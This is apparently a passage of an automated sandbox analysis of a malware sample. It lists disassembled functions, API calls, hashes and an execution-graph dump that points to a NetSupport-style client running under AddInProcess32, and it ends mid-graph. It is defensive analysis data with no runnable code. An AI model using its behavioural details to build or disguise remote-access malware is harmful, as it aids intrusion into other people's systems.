                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EncodePointer
                                                                                                            • String ID: MOC$RCC
                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                            • Opcode ID: f38d9cb25aa6dfc8a72ca3406d5f2338f5c32c31393292f4011166daf61a950d
                                                                                                            • Instruction ID: 4ac13803e4d5ca742f2069cf5601cbd93e777c9f887da7f4d15751ecf4808dc5
                                                                                                            • Opcode Fuzzy Hash: f38d9cb25aa6dfc8a72ca3406d5f2338f5c32c31393292f4011166daf61a950d
                                                                                                            • Instruction Fuzzy Hash: D241BA71A0020AAFDF16CF94CD81AEEBBB1BF48304F1480AAF9057B292D3399D51DB55
                                                                                                            Function 00406F60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00406FA8
                                                                                                            • ___raise_securityfailure.LIBCMT ref: 00407090
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                            • String ID: X)B
                                                                                                            • API String ID: 3761405300-1098520909
                                                                                                            • Opcode ID: 7660bb6e8ad02ded4dac60b132e9aeee3ab913c4838ec0a0fbf2420198f39870
                                                                                                            • Instruction ID: edf480fd9900d96946d1fb7b902f312f2e1ee033d1a97d8879616f167246f57c
                                                                                                            • Opcode Fuzzy Hash: 7660bb6e8ad02ded4dac60b132e9aeee3ab913c4838ec0a0fbf2420198f39870
                                                                                                            • Instruction Fuzzy Hash: 6421BFB5701305AAE734CF15FA86A617BA4BB08354F90503AE5099AEB0D3F49A92CF4D
                                                                                                            Function 004070A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004070AE
                                                                                                            • ___raise_securityfailure.LIBCMT ref: 0040716B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                            • String ID: X)B
                                                                                                            • API String ID: 3761405300-1098520909
                                                                                                            • Opcode ID: 4ca52ba7993b1bf8668e0bc1dcae837b018e0a703b76ddd744c5681627d506fe
                                                                                                            • Instruction ID: 539942d66ec76249163cc16820ef38eeed5544e5010e9a3f47c3daf008d588c5
                                                                                                            • Opcode Fuzzy Hash: 4ca52ba7993b1bf8668e0bc1dcae837b018e0a703b76ddd744c5681627d506fe
                                                                                                            • Instruction Fuzzy Hash: 34119CB5B11245ABDB34CF15EA856517BA4BB08340B80603AE80997FB0E7F09A97CF4D
                                                                                                            Function 00411472 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0040F3AB), ref: 004114B2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                                                            • String ID: Fx@$InitializeCriticalSectionEx
                                                                                                            • API String ID: 2593887523-448776849
                                                                                                            • Opcode ID: e87d91127952a8dc22b5428e2afc5b15bddff06ead816acb92f64444e91ac5d6
                                                                                                            • Instruction ID: 8c4a806392b081a594d943fa2f9f988a49f1e782b074da32be5c716ced234856
                                                                                                            • Opcode Fuzzy Hash: e87d91127952a8dc22b5428e2afc5b15bddff06ead816acb92f64444e91ac5d6
                                                                                                            • Instruction Fuzzy Hash: 50E09235580229BBCB122F41EC19EDE3F11EF40BA0B158022FE1C15171C77A8CA1D6DC
                                                                                                            Function 00411373 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Alloc
                                                                                                            • String ID: FlsAlloc$Fx@
                                                                                                            • API String ID: 2773662609-214802781
                                                                                                            • Opcode ID: 5dae29d0728023c45b54f6ed28715b5773cd5894d0ff809e6f4c406c58bfbcff
                                                                                                            • Instruction ID: 5cd6a7e703b151d4c349517ca756f394920c3fd9b28e445f9c2919a88c313ee0
                                                                                                            • Opcode Fuzzy Hash: 5dae29d0728023c45b54f6ed28715b5773cd5894d0ff809e6f4c406c58bfbcff
                                                                                                            • Instruction Fuzzy Hash: FCE0C231A803297397112791BC0EAEE7E05CB44F60B2440B3FF2DA26A5DABA4CC155DE

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:4.5%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:12.1%
                                                                                                            Total number of Nodes:2000
                                                                                                            Total number of Limit Nodes:76
                                                                                                            execution_graph 119067 401020 GetCommandLineA 119069 401032 GetStartupInfoA 119067->119069 119070 401086 GetModuleHandleA 119069->119070 119074 401000 _NSMClient32 119070->119074 119073 4010a8 ExitProcess 119074->119073 119075 11017640 GetTickCount 119082 11017550 119075->119082 119083 11017570 119082->119083 119084 11017626 119082->119084 119086 11017592 CoInitialize _GetRawWMIStringW 119083->119086 119089 11017589 WaitForSingleObject 119083->119089 119114 1115e3e1 119084->119114 119087 11017612 119086->119087 119091 110175c5 119086->119091 119087->119084 119090 11017620 CoUninitialize 119087->119090 119088 11017635 119095 11017470 119088->119095 119089->119086 119090->119084 119091->119087 119092 1101760c 119091->119092 119122 1116010d 119091->119122 119127 1115ff17 67 API calls __fassign 119092->119127 119096 11017490 119095->119096 119103 11017536 119095->119103 119097 110174a8 CoInitialize _GetRawWMIStringW 119096->119097 119099 1101749f WaitForSingleObject 119096->119099 119100 11017522 119097->119100 119104 110174db 119097->119104 119098 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 119101 11017545 SetEvent GetTickCount 119098->119101 119099->119097 119102 11017530 CoUninitialize 119100->119102 119100->119103 119108 11142790 119101->119108 119102->119103 119103->119098 119104->119100 119105 1101751c 119104->119105 119107 1116010d std::_Mutex::_Mutex 79 API calls 119104->119107 119130 1115ff17 67 API calls __fassign 119105->119130 119107->119104 119109 111427a1 119108->119109 119110 1114279c 119108->119110 119132 11141c90 119109->119132 119131 11141a40 18 API calls std::_Mutex::_Mutex 119110->119131 119115 1115e3e9 119114->119115 119116 1115e3eb IsDebuggerPresent 119114->119116 119115->119088 119128 11173d17 119116->119128 119119 11168379 SetUnhandledExceptionFilter UnhandledExceptionFilter 119120 11168396 __call_reportfault 119119->119120 119121 1116839e GetCurrentProcess TerminateProcess 119119->119121 119120->119121 119121->119088 119123 1116012d 119122->119123 119124 1116011b 119122->119124 119129 111600bc 79 API calls 2 library calls 119123->119129 119124->119091 119126 11160137 119126->119091 119127->119087 119128->119119 119129->119126 119130->119100 119131->119109 119135 11141b40 119132->119135 119134 11017687 119136 11141b64 119135->119136 119137 11141b69 119135->119137 119155 11141a40 18 API calls std::_Mutex::_Mutex 119136->119155 119139 11141bd2 119137->119139 119140 11141b72 119137->119140 119141 11141c7e 119139->119141 119142 11141bdf wsprintfA 119139->119142 119143 11141ba9 119140->119143 119146 11141b80 119140->119146 119144 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 119141->119144 119145 11141c02 119142->119145 119149 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 119143->119149 119147 11141c8a 119144->119147 119145->119145 119148 11141c09 wvsprintfA 119145->119148 119152 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 119146->119152 119147->119134 119151 11141c24 119148->119151 119150 11141bce 119149->119150 119150->119134 119151->119151 119154 11141c71 OutputDebugStringA 119151->119154 119153 11141ba5 119152->119153 119153->119134 119154->119141 119155->119137 119156 110301c1 RegOpenKeyExA 119157 11030309 119156->119157 119158 110301e9 119156->119158 119161 1103032d 119157->119161 119163 11030411 119157->119163 119240 1113f3a0 RegQueryValueExA 119158->119240 119246 1110c4b0 119161->119246 119162 110302fc RegCloseKey 119162->119157 119166 1110c4b0 std::_Mutex::_Mutex 265 API calls 119163->119166 119168 11030418 119166->119168 119400 110f8090 272 API calls std::_Mutex::_Mutex 119168->119400 119169 1116010d std::_Mutex::_Mutex 79 API calls 119170 11030234 119169->119170 119172 11030252 119170->119172 119177 1116010d std::_Mutex::_Mutex 79 API calls 119170->119177 119175 1115f4c7 std::_Mutex::_Mutex 79 API calls 119172->119175 119173 11030354 119174 110305a7 GetStockObject GetObjectA 119173->119174 119176 110305d6 SetErrorMode SetErrorMode 119174->119176 119181 1103025e 119175->119181 119179 1110c4b0 std::_Mutex::_Mutex 265 API calls 119176->119179 119177->119170 119180 11030612 119179->119180 119255 11027fb0 119180->119255 119181->119162 119182 1113f3a0 std::_Mutex::_Mutex RegQueryValueExA 119181->119182 119185 110302b4 119182->119185 119184 1103062c 119187 1110c4b0 std::_Mutex::_Mutex 265 API calls 119184->119187 119186 1113f3a0 std::_Mutex::_Mutex RegQueryValueExA 119185->119186 119188 110302dd 119186->119188 119189 11030652 119187->119189 119188->119162 119190 11027fb0 268 API calls 119189->119190 119191 1103066b InterlockedExchange 119190->119191 119193 1110c4b0 std::_Mutex::_Mutex 265 API calls 119191->119193 119194 11030693 119193->119194 119258 11089560 119194->119258 119196 110306ab GetACP 119269 1115f7b3 119196->119269 119201 110306dc 119316 1113ef50 119201->119316 119204 1110c4b0 std::_Mutex::_Mutex 265 API calls 119205 11030728 119204->119205 119322 110605c0 119205->119322 119208 110307a0 119341 110cb7c0 119208->119341 119209 1110c4b0 std::_Mutex::_Mutex 265 API calls 119211 1103077a 119209->119211 119401 11060230 119211->119401 119213 1110c4b0 std::_Mutex::_Mutex 265 API calls 119215 110307cd 119213->119215 119348 11121ff0 119215->119348 119241 11030211 119240->119241 119241->119162 119242 1115f4c7 119241->119242 119243 1115f4b1 119242->119243 119414 1115fd2b 119243->119414 119247 1115f231 _malloc 66 API calls 119246->119247 119248 1110c4ce 119247->119248 119249 1110c503 _memset 119248->119249 119250 1110c4d7 wsprintfA 119248->119250 119253 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 119249->119253 119581 110290c0 265 API calls 2 library calls 119250->119581 119254 1110c51d 119253->119254 119254->119173 119256 11087960 268 API calls 119255->119256 119257 11027fbb _memset 119256->119257 119257->119184 119259 1110c4b0 std::_Mutex::_Mutex 265 API calls 119258->119259 119260 11089597 119259->119260 119261 110895b9 InitializeCriticalSection 119260->119261 119262 1110c4b0 std::_Mutex::_Mutex 265 API calls 119260->119262 119265 1108961a 119261->119265 119264 110895b2 119262->119264 119264->119261 119582 1115e87a 66 API calls std::exception::_Copy_str 119264->119582 119265->119196 119267 110895e9 119583 1115ecd1 RaiseException 119267->119583 119270 1115f7e6 119269->119270 119271 1115f7d1 119269->119271 119270->119271 119272 1115f7ed 119270->119272 119584 111659cf 66 API calls __getptd_noexit 119271->119584 119586 1116baca 102 API calls 11 library calls 119272->119586 119275 1115f7d6 119585 1116a5e4 11 API calls __tsopen_nolock 119275->119585 119276 1115f813 119278 110306d2 119276->119278 119587 1116b904 97 API calls 6 library calls 119276->119587 119280 11161b76 119278->119280 119281 11161b82 __tsopen_nolock 119280->119281 119282 11161ba3 119281->119282 119283 11161b8c 119281->119283 119285 11167e95 __getptd 66 API calls 119282->119285 119613 111659cf 66 API calls __getptd_noexit 119283->119613 119287 11161ba8 119285->119287 119286 11161b91 119614 1116a5e4 11 API calls __tsopen_nolock 119286->119614 119289 1116cb55 _localeconv 74 API calls 119287->119289 119290 11161bb2 119289->119290 119291 1116649e __calloc_crt 66 API calls 119290->119291 119292 11161bc8 119291->119292 119293 11161b9c __tsopen_nolock _setlocale 119292->119293 119294 1116fdec __lock 66 API calls 119292->119294 119293->119201 119295 11161bde 119294->119295 119588 11160fe4 119295->119588 119302 11161c0e __expandlocale 119305 1116fdec __lock 66 API calls 119302->119305 119303 11161cbf 119619 1116c924 8 API calls 119303->119619 119308 11161c34 119305->119308 119306 11161cc5 119620 1116c9bd 66 API calls 4 library calls 119306->119620 119615 1116cb08 74 API calls 3 library calls 119308->119615 119310 11161c46 119616 1116c924 8 API calls 119310->119616 119312 11161c4c 119313 11161c6a 119312->119313 119617 1116cb08 74 API calls 3 library calls 119312->119617 119618 11161cb4 LeaveCriticalSection _doexit 119313->119618 119772 1113ee60 119316->119772 119318 11161e79 85 API calls std::_Mutex::_Mutex 119320 1113ef65 119318->119320 119319 1113ee60 IsDBCSLeadByte 119319->119320 119320->119318 119320->119319 119321 11030708 119320->119321 119321->119204 119323 11060230 293 API calls 119322->119323 119324 110605fe 119323->119324 119325 1110c4b0 std::_Mutex::_Mutex 265 API calls 119324->119325 119326 1106062b 119325->119326 119327 11060644 119326->119327 119328 11060230 293 API calls 119326->119328 119329 1110c4b0 std::_Mutex::_Mutex 265 API calls 119327->119329 119328->119327 119330 11060655 119329->119330 119331 11060230 293 API calls 119330->119331 119333 1106066e 119330->119333 119331->119333 119332 11030753 119332->119208 119332->119209 119333->119332 119784 1113e630 119333->119784 119335 11060696 119793 11060590 119335->119793 119342 110cb7c9 119341->119342 119343 110307c6 119341->119343 119912 11140be0 GetSystemMetrics GetSystemMetrics 119342->119912 119343->119213 119345 110cb7d0 std::_Mutex::_Mutex 119345->119343 119346 110cb7de CreateWindowExA 119345->119346 119346->119343 119347 110cb808 SetClassLongA 119346->119347 119347->119343 119349 1110c4b0 std::_Mutex::_Mutex 265 API calls 119348->119349 119350 11122024 119349->119350 119351 11122055 119350->119351 119352 1112203a 119350->119352 119913 11121220 119351->119913 119959 11075410 464 API calls std::_Mutex::_Mutex 119352->119959 119400->119173 119402 1110c4b0 std::_Mutex::_Mutex 265 API calls 119401->119402 119403 11060281 119402->119403 119404 11060297 InitializeCriticalSection 119403->119404 121065 1105fd30 266 API calls 3 library calls 119403->121065 119407 110602d7 119404->119407 119408 11060346 119404->119408 121066 1105e3b0 287 API calls 3 library calls 119407->121066 119408->119208 119410 110602f8 RegCreateKeyExA 119411 11060352 RegCreateKeyExA 119410->119411 119412 1106031f RegCreateKeyExA 119410->119412 119411->119408 119412->119408 119412->119411 119415 1115fd44 119414->119415 119418 1115fb00 119415->119418 119430 1115fa79 119418->119430 119420 1115fb24 119438 111659cf 66 API calls __getptd_noexit 119420->119438 119423 1115fb29 119439 1116a5e4 11 API calls __tsopen_nolock 119423->119439 119426 1115fb5a 119428 1115fba1 119426->119428 119440 1116d2b2 79 API calls 3 library calls 119426->119440 119427 11030225 119427->119169 119428->119427 119441 111659cf 66 API calls __getptd_noexit 119428->119441 119431 1115fa8c 119430->119431 119437 1115fad9 119430->119437 119442 11167e95 119431->119442 119434 1115fab9 119434->119437 119462 1116cdf1 68 API calls 6 library calls 119434->119462 119437->119420 119437->119426 119438->119423 119439->119427 119440->119426 119441->119427 119463 11167e1c GetLastError 119442->119463 119444 11167e9d 119445 1115fa91 119444->119445 119477 11169e8a 66 API calls 3 library calls 119444->119477 119445->119434 119447 1116cb55 119445->119447 119448 1116cb61 __tsopen_nolock 119447->119448 119449 11167e95 __getptd 66 API calls 119448->119449 119450 1116cb66 119449->119450 119451 1116cb94 119450->119451 119453 1116cb78 119450->119453 119507 1116fdec 119451->119507 119455 11167e95 __getptd 66 API calls 119453->119455 119454 1116cb9b 119514 1116cb08 74 API calls 3 library calls 119454->119514 119457 1116cb7d 119455->119457 119460 1116cb8b __tsopen_nolock 119457->119460 119506 11169e8a 66 API calls 3 library calls 119457->119506 119458 1116cbaf 119515 1116cbc2 LeaveCriticalSection _doexit 119458->119515 119460->119434 119462->119437 119478 11167cda TlsGetValue 119463->119478 119466 11167e89 SetLastError 119466->119444 119469 11167e4f DecodePointer 119470 11167e64 119469->119470 119471 11167e80 119470->119471 119472 11167e68 119470->119472 119488 1115f2c5 119471->119488 119487 11167d68 66 API calls 4 library calls 119472->119487 119475 11167e70 GetCurrentThreadId 119475->119466 119476 11167e86 119476->119466 119479 11167cef DecodePointer TlsSetValue 119478->119479 119480 11167d0a 119478->119480 119479->119480 119480->119466 119481 1116649e 119480->119481 119484 111664a7 119481->119484 119483 111664e4 119483->119466 119483->119469 119484->119483 119485 111664c5 Sleep 119484->119485 119494 1116c813 119484->119494 119486 111664da 119485->119486 119486->119483 119486->119484 119487->119475 119489 1115f2d0 HeapFree 119488->119489 119493 1115f2f9 __dosmaperr 119488->119493 119490 1115f2e5 119489->119490 119489->119493 119505 111659cf 66 API calls __getptd_noexit 119490->119505 119492 1115f2eb GetLastError 119492->119493 119493->119476 119495 1116c81f 119494->119495 119501 1116c83a 119494->119501 119496 1116c82b 119495->119496 119495->119501 119503 111659cf 66 API calls __getptd_noexit 119496->119503 119498 1116c84d RtlAllocateHeap 119500 1116c874 119498->119500 119498->119501 119499 1116c830 119499->119484 119500->119484 119501->119498 119501->119500 119504 11169b88 DecodePointer 119501->119504 119503->119499 119504->119501 119505->119492 119508 1116fe14 EnterCriticalSection 119507->119508 119509 1116fe01 119507->119509 119508->119454 119516 1116fd2a 119509->119516 119511 1116fe07 119511->119508 119543 11169e8a 66 API calls 3 library calls 119511->119543 119514->119458 119515->119457 119517 1116fd36 __tsopen_nolock 119516->119517 119518 1116fd46 119517->119518 119519 1116fd5e 119517->119519 119544 1116a07d 66 API calls 2 library calls 119518->119544 119528 1116fd6c __tsopen_nolock 119519->119528 119547 11166459 119519->119547 119522 1116fd4b 119545 11169ece 66 API calls 7 library calls 119522->119545 119525 1116fd52 119546 11169c0d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 119525->119546 119526 1116fd7e 119553 111659cf 66 API calls __getptd_noexit 119526->119553 119527 1116fd8d 119531 1116fdec __lock 65 API calls 119527->119531 119528->119511 119533 1116fd94 119531->119533 119534 1116fdc7 119533->119534 119535 1116fd9c InitializeCriticalSectionAndSpinCount 119533->119535 119538 1115f2c5 _free 65 API calls 119534->119538 119536 1116fdb8 119535->119536 119537 1116fdac 119535->119537 119555 1116fde3 LeaveCriticalSection _doexit 119536->119555 119539 1115f2c5 _free 65 API calls 119537->119539 119538->119536 119540 1116fdb2 119539->119540 119554 111659cf 66 API calls __getptd_noexit 119540->119554 119544->119522 119545->119525 119549 11166462 119547->119549 119550 11166498 119549->119550 119551 11166479 Sleep 119549->119551 119556 1115f231 119549->119556 119550->119526 119550->119527 119552 1116648e 119551->119552 119552->119549 119552->119550 119553->119528 119554->119536 119555->119528 119557 1115f2ae 119556->119557 119563 1115f23f 119556->119563 119579 11169b88 DecodePointer 119557->119579 119559 1115f2b4 119580 111659cf 66 API calls __getptd_noexit 119559->119580 119562 1115f26d RtlAllocateHeap 119562->119563 119572 1115f2a6 119562->119572 119563->119562 119565 1115f29a 119563->119565 119566 1115f24a 119563->119566 119570 1115f298 119563->119570 119576 11169b88 DecodePointer 119563->119576 119577 111659cf 66 API calls __getptd_noexit 119565->119577 119566->119563 119573 1116a07d 66 API calls 2 library calls 119566->119573 119574 11169ece 66 API calls 7 library calls 119566->119574 119575 11169c0d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 119566->119575 119578 111659cf 66 API calls __getptd_noexit 119570->119578 119572->119549 119573->119566 119574->119566 119576->119563 119577->119570 119578->119572 119579->119559 119580->119572 119582->119267 119583->119261 119584->119275 119585->119278 119586->119276 119587->119278 119589 11160fed 119588->119589 119590 11161006 119588->119590 119589->119590 119621 1116c895 8 API calls 119589->119621 119592 11161ca8 119590->119592 119622 1116fd13 LeaveCriticalSection 119592->119622 119594 11161bf5 119595 1116195a 119594->119595 119596 11161983 119595->119596 119597 1116199e 119595->119597 119599 11161620 __setlocale_set_cat 101 API calls 119596->119599 119602 1116198d 119596->119602 119600 11161aef 119597->119600 119608 11161ac8 119597->119608 119609 111619d3 _strpbrk _strncmp _strcspn _strlen 119597->119609 119599->119602 119623 111613ff 119600->119623 119603 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 119602->119603 119604 11161b74 119603->119604 119604->119302 119604->119303 119605 11161b04 __expandlocale 119605->119602 119605->119608 119637 11161620 119605->119637 119608->119602 119683 1116129a 70 API calls 6 library calls 119608->119683 119609->119602 119609->119608 119610 11161ae1 119609->119610 119612 11161620 __setlocale_set_cat 101 API calls 119609->119612 119679 11165219 66 API calls __tsopen_nolock 119609->119679 119680 1116a592 119610->119680 119612->119609 119613->119286 119614->119293 119615->119310 119616->119312 119617->119313 119618->119293 119619->119306 119620->119293 119621->119590 119622->119594 119624 11167e95 __getptd 66 API calls 119623->119624 119625 1116143a 119624->119625 119629 111614a7 119625->119629 119635 111614a0 __expandlocale _memmove _strlen 119625->119635 119727 1116857f 119625->119727 119626 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 119627 1116161e 119626->119627 119627->119605 119629->119626 119631 1116a592 __invoke_watson 10 API calls 119631->119635 119633 1116857f _strcpy_s 66 API calls 119633->119635 119635->119629 119635->119631 119635->119633 119684 11161110 119635->119684 119691 11170419 119635->119691 119736 1116122f 66 API calls 3 library calls 119635->119736 119737 11165219 66 API calls __tsopen_nolock 119635->119737 119638 11167e95 __getptd 66 API calls 119637->119638 119639 1116164d 119638->119639 119640 111613ff __expandlocale 96 API calls 119639->119640 119644 11161675 __expandlocale _strlen 119640->119644 119641 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 119642 1116168a 119641->119642 119642->119605 119643 1116167c 119643->119641 119644->119643 119645 11166459 __malloc_crt 66 API calls 119644->119645 119646 111616c6 _memmove 119645->119646 119646->119643 119647 1116857f _strcpy_s 66 API calls 119646->119647 119649 11161739 _memmove 119647->119649 119666 11161928 119649->119666 119672 1116183d _memcmp 119649->119672 119763 111706f1 79 API calls 2 library calls 119649->119763 119679->119609 119766 1116a469 119680->119766 119683->119602 119685 11161129 _memset 119684->119685 119687 11161135 119685->119687 119690 11161158 _strcspn 119685->119690 119738 11165219 66 API calls __tsopen_nolock 119685->119738 119687->119635 119688 1116a592 __invoke_watson 10 API calls 119688->119690 119690->119687 119690->119688 119739 11165219 66 API calls __tsopen_nolock 119690->119739 119692 11167e95 __getptd 66 API calls 119691->119692 119695 11170426 119692->119695 119694 1117045d 119697 111704c5 119694->119697 119700 1117046f 119694->119700 119695->119694 119698 11170433 GetUserDefaultLCID 119695->119698 119750 1116fe8c 85 API calls _LanguageEnumProc@4 119695->119750 119696 111704ba 119726 111705fb 119696->119726 119740 1116feee 119696->119740 119697->119698 119701 111704d0 _strlen 119697->119701 119698->119696 119703 11170483 119700->119703 119704 1117047a 119700->119704 119708 111704d6 EnumSystemLocalesA 119701->119708 119755 111703dd EnumSystemLocalesA _GetPrimaryLen _strlen 119703->119755 119751 11170376 119704->119751 119706 1117052b 119711 11170550 IsValidCodePage 119706->119711 119706->119726 119708->119696 119709 11170481 119709->119696 119756 1116fe8c 85 API calls _LanguageEnumProc@4 119709->119756 119712 11170562 IsValidLocale 119711->119712 119711->119726 119718 11170575 119712->119718 119712->119726 119713 111704a1 119713->119696 119714 111704bc 119713->119714 119715 111704b3 119713->119715 119757 111703dd EnumSystemLocalesA _GetPrimaryLen _strlen 119714->119757 119719 11170376 _GetLcidFromLangCountry EnumSystemLocalesA 119715->119719 119717 111705c6 GetLocaleInfoA 119717->119726 119718->119717 119720 1116857f _strcpy_s 66 API calls 119718->119720 119718->119726 119719->119696 119726->119635 119728 11168594 119727->119728 119729 1116858d 119727->119729 119760 111659cf 66 API calls __getptd_noexit 119728->119760 119729->119728 119734 111685b2 119729->119734 119731 11168599 119761 1116a5e4 11 API calls __tsopen_nolock 119731->119761 119733 111685a3 119733->119635 119734->119733 119762 111659cf 66 API calls __getptd_noexit 119734->119762 119736->119635 119737->119635 119738->119690 119739->119690 119741 1116ff48 GetLocaleInfoW 119740->119741 119743 1116fef8 __expandlocale 119740->119743 119742 1116ff64 119741->119742 119744 1116ff37 119741->119744 119742->119744 119745 1116ff6a GetACP 119742->119745 119743->119741 119746 1116ff0e __expandlocale 119743->119746 119744->119706 119745->119706 119747 1116ff1f GetLocaleInfoW 119746->119747 119748 1116ff3c 119746->119748 119747->119744 119759 1115f4b1 79 API calls __wcstoi64 119748->119759 119750->119694 119752 1117037d _GetPrimaryLen _strlen 119751->119752 119753 111703b3 EnumSystemLocalesA 119752->119753 119754 111703cd 119753->119754 119754->119709 119755->119709 119756->119713 119757->119696 119759->119744 119760->119731 119761->119733 119762->119731 119763->119672 119767 1116a488 _memset __call_reportfault 119766->119767 119768 1116a4a6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 119767->119768 119771 1116a574 __call_reportfault 119768->119771 119769 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 119770 1116a590 GetCurrentProcess TerminateProcess 119769->119770 119770->119602 119771->119769 119773 1113ee76 119772->119773 119774 1113ef33 119773->119774 119779 11080b80 119773->119779 119774->119320 119776 1113ee9b 119777 11080b80 IsDBCSLeadByte 119776->119777 119778 1113eecb _memmove 119777->119778 119778->119320 119780 11080b8c 119779->119780 119782 11080b91 std::_Mutex::_Mutex __mbschr_l 119779->119782 119783 11080aa0 IsDBCSLeadByte 119780->119783 119782->119776 119783->119782 119785 1113e63a 119784->119785 119786 1113e63c 119784->119786 119785->119335 119796 1110c530 119786->119796 119788 1113e662 119789 1113e66b _strncpy 119788->119789 119790 1113e689 119788->119790 119789->119335 119803 110290c0 265 API calls 2 library calls 119790->119803 119805 11060490 119793->119805 119797 1115f231 _malloc 66 API calls 119796->119797 119798 1110c53e 119797->119798 119799 1110c547 119798->119799 119800 1110c55e _memset 119798->119800 119804 110290c0 265 API calls 2 library calls 119799->119804 119800->119788 119816 1105fdb0 119805->119816 119817 1110c4b0 std::_Mutex::_Mutex 265 API calls 119816->119817 119818 1105fdcc 119817->119818 119819 1105fe15 119818->119819 119820 1105fdd3 119818->119820 119875 1115e87a 66 API calls std::exception::_Copy_str 119819->119875 119868 1105d940 119820->119868 119824 1105fe24 119869 1105d951 LeaveCriticalSection 119868->119869 119870 1105d95b 119868->119870 119869->119870 119875->119824 119912->119345 121065->119404 121066->119410 121067 110303a1 GetNativeSystemInfo 121068 110303ad 121067->121068 121071 11030411 121068->121071 121072 1103034d 121068->121072 121082 11030354 121068->121082 121069 110305a7 GetStockObject GetObjectA 121070 110305d6 SetErrorMode SetErrorMode 121069->121070 121076 1110c4b0 std::_Mutex::_Mutex 265 API calls 121070->121076 121075 1110c4b0 std::_Mutex::_Mutex 265 API calls 121071->121075 121074 1110c4b0 std::_Mutex::_Mutex 265 API calls 121072->121074 121074->121082 121077 11030418 121075->121077 121078 11030612 121076->121078 121135 110f8090 272 API calls std::_Mutex::_Mutex 121077->121135 121080 11027fb0 268 API calls 121078->121080 121081 1103062c 121080->121081 121083 1110c4b0 std::_Mutex::_Mutex 265 API calls 121081->121083 121082->121069 121084 11030652 121083->121084 121085 11027fb0 268 API calls 121084->121085 121086 1103066b InterlockedExchange 121085->121086 121088 1110c4b0 std::_Mutex::_Mutex 265 API calls 121086->121088 121089 11030693 121088->121089 121090 11089560 267 API calls 121089->121090 121091 110306ab GetACP 121090->121091 121093 1115f7b3 _sprintf 102 API calls 121091->121093 121094 110306d2 121093->121094 121095 11161b76 _setlocale 101 API calls 121094->121095 121096 110306dc 121095->121096 121097 1113ef50 86 API calls 121096->121097 121098 11030708 121097->121098 121099 1110c4b0 std::_Mutex::_Mutex 265 API calls 121098->121099 121100 11030728 121099->121100 121101 110605c0 301 API calls 121100->121101 121102 11030753 121101->121102 121103 110307a0 121102->121103 121104 1110c4b0 std::_Mutex::_Mutex 265 API calls 121102->121104 121105 110cb7c0 4 API calls 121103->121105 121106 1103077a 121104->121106 121107 110307c6 121105->121107 121109 11060230 293 API calls 121106->121109 121108 1110c4b0 std::_Mutex::_Mutex 265 API calls 121107->121108 121110 110307cd 121108->121110 121109->121103 121111 11121ff0 509 API calls 121110->121111 121112 110307ef 121111->121112 121113 11111350 268 API calls 121112->121113 121114 11030810 121113->121114 121115 1110c4b0 std::_Mutex::_Mutex 265 API calls 121114->121115 121116 11030827 121115->121116 121117 11087960 268 API calls 121116->121117 121118 1103083f 121117->121118 121119 1110c4b0 std::_Mutex::_Mutex 265 API calls 121118->121119 121120 11030856 121119->121120 121121 1105b8d0 325 API calls 